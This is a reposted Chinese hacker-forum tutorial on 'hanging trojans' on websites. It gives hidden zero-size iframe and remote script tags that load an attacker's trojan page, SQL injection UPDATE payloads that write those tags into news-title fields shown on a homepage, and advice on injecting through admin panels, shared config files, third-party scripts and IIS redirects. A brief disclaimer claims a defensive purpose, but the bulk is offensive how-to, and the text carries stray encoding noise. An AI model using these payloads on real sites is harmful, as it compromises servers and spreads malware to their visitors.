[轉(zhuǎn)載]多姿多彩的網(wǎng)站掛馬方式
信息來源:黑客基地
--------------------------------------------------------------------------
先說明一點(diǎn)��,不是怎么教大家掛馬�����,是讓你學(xué)會掛馬�,怎么防守�,怎么找馬,怎么找關(guān)鍵字�,怎么讓你學(xué)會別人是通過什么方法掛到你的網(wǎng)站上的..
有利就有弊,隨便怎么看吧����。
--------------------------------------------------------------------------
這里我拿掛首頁index.asp來舉例子。
先說一說����,得到webshell的掛馬方法
一般的掛馬的都是用框架,這是最基本的掛馬方式,只要不破壞原有的語言邏輯�,那就想插入哪里就寫哪里了,最基本的語句當(dāng)然是<iframe src=http://www./mm.htm width=0 height=0></iframe>�����,其中http://www./mm.htm是我們的木馬�����,下面就不一個(gè)一個(gè)提示了���。
上面可能是一般的掛馬方式��,也是初學(xué)者的玩法�,好了��,再說深一點(diǎn)點(diǎn)的��,那就是js文件����,好多網(wǎng)站上��,你查看源代碼都會調(diào)用js文件,其中的語句為<script language=javascript src=./ad/ad.js></script>�����,想到了什么�����,這里也可以掛馬��,其中我們可以遠(yuǎn)程調(diào)用自己的js�����,比如:<script language=javascript src=http://www./mm.js></script>這個(gè)mm.js就可以寫木馬了����,怎么寫呢,同樣�,我們還用最基本的iframe框架,不過在<script></script>之中可識別語言不是html��,那怎么辦呢�����,follow me,js文件可以這樣寫:document.write("<iframe <iframe src=http://www./mm.htm width=0 height=0></iframe>");,這種形勢�����,這時(shí)就可以執(zhí)行此js中的代碼了����,當(dāng)然了,說白了�����,其實(shí)全語句就是<script language=javascript>document.write("<iframe <iframe src=http://www./mm.htm width=0 height=0></iframe>")</script>呵呵�。。
聰明的你可能發(fā)現(xiàn)了一點(diǎn)����,好像不止是js文件哦~,只要在<script></script>之中����,無論什么后綴的文件,只要里面寫的語句可以被javascript識別就會執(zhí)行��,對的�,比如<script src=http://www./mm.test></script>����,又如<script src=http://www./mm.lala></script>管他的后綴是什么��,只要里面寫的語句正確就會被執(zhí)行了����。
同樣�,如果首頁調(diào)用其它網(wǎng)站,或者次級目錄中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里掛馬�,可以是htm和js,隨便哪種�����,這是比較隱蔽的玩法�����,這些適用于主頁沒有寫權(quán)限的方法�����。
<script>同<iframe>2個(gè)相比較����,好處是script整體掛馬的代碼長度比iframe小得多���,很實(shí)用。說實(shí)用是在數(shù)據(jù)庫方面����,下面介紹。
數(shù)據(jù)庫掛馬�,這里我們拿mssql數(shù)據(jù)庫為例子。
這里說的是首頁調(diào)用到的數(shù)據(jù)庫��,比如新聞�,論壇,公告����,等等,一般是標(biāo)題�。這些需要經(jīng)驗(yàn)去檢測,舉個(gè)例子��,比如首頁有一條新聞為:“明日開業(yè)”�����,那么鼠標(biāo)點(diǎn)此新聞,地址欄打開的新窗口為news.asp?id=1���,這種情況���,這時(shí)�,就可以判斷此新聞是從數(shù)據(jù)庫中調(diào)用的了,當(dāng)然了����,我們不說access,只說mssql�。
首頁,我們要有這個(gè)網(wǎng)站中的一個(gè)注入點(diǎn)�����,比如就點(diǎn)在vote.asp?id=123�����,同時(shí)����,至少是Db_owner權(quán)限����,這時(shí)如果要掛馬可以不用取到webshell���,因?yàn)槿绻覀兊哪康闹辉谟趻祚R的話����,而且有時(shí)��,還得檢測mssql數(shù)據(jù)庫和web服務(wù)器不在同一個(gè)機(jī)器上��,那掛馬的方式就是更改數(shù)據(jù)庫內(nèi)容�����,這里我說的就是這種��,如上面說的���,首頁顯示的一條新聞標(biāo)題為“明日開業(yè)”�����,如果首頁顯示的標(biāo)題是“明日開業(yè)</a><iframe src=http://www./mm.htm width=0 height=0></iframe>”�,那這樣的話,首頁就會執(zhí)行這段代碼了�,像這種情況,找到了注入點(diǎn)�,就得找表名,如此新聞的表名為news�����,字段為title���,id,等等,根據(jù)猜測,id=1時(shí)�,暴出的字段title的值就為“明日開業(yè)”,那么90%就可以猜到了����,首頁調(diào)用的數(shù)據(jù)庫的字段就為news表中的title,這時(shí)在注入點(diǎn)�,可以大膽提交vote.asp?id=123;update news set title=‘明日開業(yè)</a><iframe src=http://www./mm.htm width=0 height=0></iframe>‘ where id=1;--,這樣就可以更改數(shù)據(jù)庫了�,前提是最少要少db_owner權(quán)限,當(dāng)然也有時(shí)由于代碼原因�,也可以這樣提交:vote.asp?id=123‘;update news set title=‘明日開業(yè)</a><ifrmae src=http://www./mm.htm width=0 height=0></iframe>‘ where id=1 and ‘1‘=‘1,也可以...
這種方法是有問題的�����,實(shí)戰(zhàn)中存在不少問題,因?yàn)橐话愕那闆r下���,標(biāo)題都是通過<table>來限制寬度�����,也就是說如果你的標(biāo)題的長度超過了指定的長度�,那么你的代碼只能寫一半���,這樣就不能執(zhí)行了��,所以掛馬最好的方法是用<script>這種方法來掛馬了���,如:
vote.asp?id=123;update news set title=‘明日開業(yè)</a><script src=http://www./mm.js></script>‘ where id=1;--長度有很大的減少,很不錯���。
后臺掛馬
通常注入等不到webshell�,就只能靠進(jìn)后臺掛馬��。
這里說的是進(jìn)入了后臺,但不能通過后臺得到webshell�,這時(shí)要仔細(xì)關(guān)察后臺,像比較網(wǎng)站的鏈接�����、頂部底部的廣告���、都可以直接寫入你的木馬代碼��,等等����,后臺是靈活的�����,具體問題具體分析���。不過有一點(diǎn)很重要,是不要打亂前臺htm源文件里的代碼邏輯�����,比如應(yīng)該閉合前面的<a><img>"( 等這些符號,應(yīng)該先閉合掉如</a></img>")�����。
其它形式
如一首頁調(diào)用了<iframe src=vote.asp?id=1&no=view width=100></iframe>此種形勢�,一樣可以在vote.asp中直接寫入iframe木馬代碼,如果調(diào)用的是<script src=vote.asp?id=1&no=view width=100></script>在vote.asp寫代碼時(shí)���,請用document.write("")這種格式寫入�,當(dāng)然���,如果被掛文件中還有調(diào)用的文件可以繼續(xù)往深處寫�����,如果你夠狠的話���,直接寫到數(shù)據(jù)庫配置文件中,如conn.asp�����,這樣好多頁面可以同時(shí)掛上你的一種木馬了����。
當(dāng)然這里也有js文件�,一樣原理�。
掛一個(gè)網(wǎng)站的馬,不一定就得攻入他�����,有時(shí)沒有方法的同時(shí)��,可以考慮跨站���。好多站用了別的站的js文件��,如:<script src=http://www.163.com/user.js>這種情勢�,這時(shí)就可以考慮只拿163.com的權(quán)限就行了���,只要能修改到user.js文件就可以掛到你要掛的站點(diǎn)了�,同理��,也有<iframe src=http://www.163.com/user.htm>此種情況���,一樣道理��,劍走偏鋒���,達(dá)到目的,無論用什么招數(shù)了����。
服務(wù)器掛馬
這里簡單說一個(gè)比較狠的吧.
重定向任何調(diào)用的htm,js,等文件���,只要是執(zhí)行的如圖:
這種方法在計(jì)算中用搜索關(guān)鍵詞是搜索不到的���,反正本地怎么找也找不到。����。誰能想到是在iis里設(shè)置的呢?而且調(diào)用文件那么多��,怎么知道是重定向的那個(gè)文件呢��?反正現(xiàn)在想不到有什么好方法可以解決���,如果服務(wù)器如上圖被掛馬了���,偶最好的建議是重裝IIS..^_^
|
